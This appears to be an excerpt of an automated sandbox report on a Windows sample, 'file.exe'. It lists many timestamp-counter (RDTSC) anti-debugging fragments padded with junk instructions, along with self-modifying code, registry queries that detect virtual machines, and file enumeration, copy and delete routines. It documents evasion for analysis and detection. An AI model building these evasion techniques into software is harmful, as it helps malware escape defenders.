Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70143 second address: A70149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6F954 second address: A6F97B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44CFD9ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0C44CFD9D2h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0C44CFD9B0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6F97B second address: A6F981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7B2EB second address: A7B2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0C44CFD9A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7B2F5 second address: A7B306 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F0C44C1C9ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7B306 second address: A7B30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7B30A second address: A7B316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F0C44C1C9E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7B316 second address: A7B323 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0C44CFD9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BBA4 second address: A7BBD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F0C44C1C9EEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BBD3 second address: A7BBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BBD9 second address: A7BBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0C44C1C9EAh 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BBEC second address: A7BC0B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44CFD9A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0C44CFD9AEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BD3B second address: A7BD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BD41 second address: A7BD55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0C44CFD9B2h 0x0000000c jnc 00007F0C44CFD9A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7CB60 second address: A7CB73 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44C1C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jg 00007F0C44C1C9E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7CB73 second address: A7CB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7CB78 second address: A7CB7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7AA5C second address: A7AA76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44CFD9B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7AA76 second address: A7AA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0C44C1C9E8h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8174F second address: A81753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81753 second address: A81771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9EAh 0x00000007 jnp 00007F0C44C1C9E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F0C44C1C9E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81771 second address: A81775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81775 second address: A8177F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44C1C9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8177F second address: A81785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81785 second address: A817A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9F5h 0x00000007 jo 00007F0C44C1C9EEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A847F2 second address: A847F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A847F8 second address: A84806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jo 00007F0C44C1C9E6h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A844D0 second address: A844E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C44CFD9AFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A844E5 second address: A844F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F0C44C1C9E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A844F0 second address: A84506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0C44CFD9AAh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A84506 second address: A8450A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8450A second address: A84510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A84510 second address: A8452A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C44C1C9ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F0C44C1C9E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85E48 second address: A85E59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F0C44CFD9A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A926A5 second address: A926C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0C44C1C9F8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A926C7 second address: A926D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0C44CFD9A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94E89 second address: A94E8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA46C4 second address: AA46CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA46CA second address: AA46DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0C44C1C9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAD545 second address: AAD549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAD549 second address: AAD551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAD551 second address: AAD557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAD557 second address: AAD55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AABDBB second address: AABDEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C44CFD9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F0C44CFD9B3h 0x00000010 jmp 00007F0C44CFD9AEh 0x00000015 pushad 0x00000016 ja 00007F0C44CFD9A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AABDEF second address: AABDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AABDF5 second address: AABE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F0C44CFD9B3h 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AABE16 second address: AABE3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0C44C1C9ECh 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F0C44C1C9E6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0C44C1C9EAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAC112 second address: AAC11A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAC248 second address: AAC24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAC4EE second address: AAC50F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0C44CFD9A6h 0x00000008 jmp 00007F0C44CFD9B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAC83D second address: AAC846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAC846 second address: AAC870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44CFD9AEh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C44CFD9B1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAC870 second address: AAC874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAC874 second address: AAC878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2E44 second address: AB2E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2E4A second address: AB2E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44CFD9ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2E59 second address: AB2E5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB4AF2 second address: AB4AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB4AF8 second address: AB4AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB4964 second address: AB4968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB4968 second address: AB496E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB6EC5 second address: AB6EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC23D5 second address: AC23DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC23DB second address: AC23F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44CFD9B3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC23F6 second address: AC240D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44C1C9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC240D second address: AC2411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE228 second address: ABE22C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE22C second address: ABE232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE232 second address: ABE23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2028 second address: AD2053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44CFD9B0h 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F0C44CFD9A6h 0x00000011 jnp 00007F0C44CFD9A6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 jnl 00007F0C44CFD9A6h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE063E second address: AE0642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0642 second address: AE065B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ecx 0x0000000c je 00007F0C44CFD9A6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE065B second address: AE065F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE079F second address: AE07AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F0C45403116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE07AB second address: AE07B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0914 second address: AE0920 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0C45403116h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0AA4 second address: AE0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0D2E second address: AE0D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F0C45403116h 0x0000000c js 00007F0C45403116h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0D40 second address: AE0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007F0C45332E1Ch 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0EA7 second address: AE0EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1160 second address: AE1173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F0C45332E12h 0x0000000b jne 00007F0C45332E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE12B2 second address: AE12B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE12B6 second address: AE12CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0C45332E06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F0C45332E06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE3FF0 second address: AE4009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0C45403116h 0x00000009 ja 00007F0C45403116h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE4009 second address: AE400D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE400D second address: AE4013 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE56D4 second address: AE56E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0C45332E0Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE56E8 second address: AE56FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C4540311Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7372 second address: AE738E instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C45332E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jg 00007F0C45332E06h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6F5A second address: AE6F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C45403121h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE6F70 second address: AE6F7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0C45332E0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000359 second address: 50003FE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0C4540311Fh 0x00000008 and si, 1ADEh 0x0000000d jmp 00007F0C45403129h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 jmp 00007F0C4540311Eh 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F0C4540311Eh 0x00000027 xor eax, 68FD9A08h 0x0000002d jmp 00007F0C4540311Bh 0x00000032 popfd 0x00000033 push eax 0x00000034 jmp 00007F0C4540311Fh 0x00000039 pop eax 0x0000003a popad 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F0C45403120h 0x00000045 or eax, 14FE0F98h 0x0000004b jmp 00007F0C4540311Bh 0x00000050 popfd 0x00000051 pushad 0x00000052 popad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A075A6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A29B37 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A8A8DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_006238B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00624910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00624910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0061DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0061E430
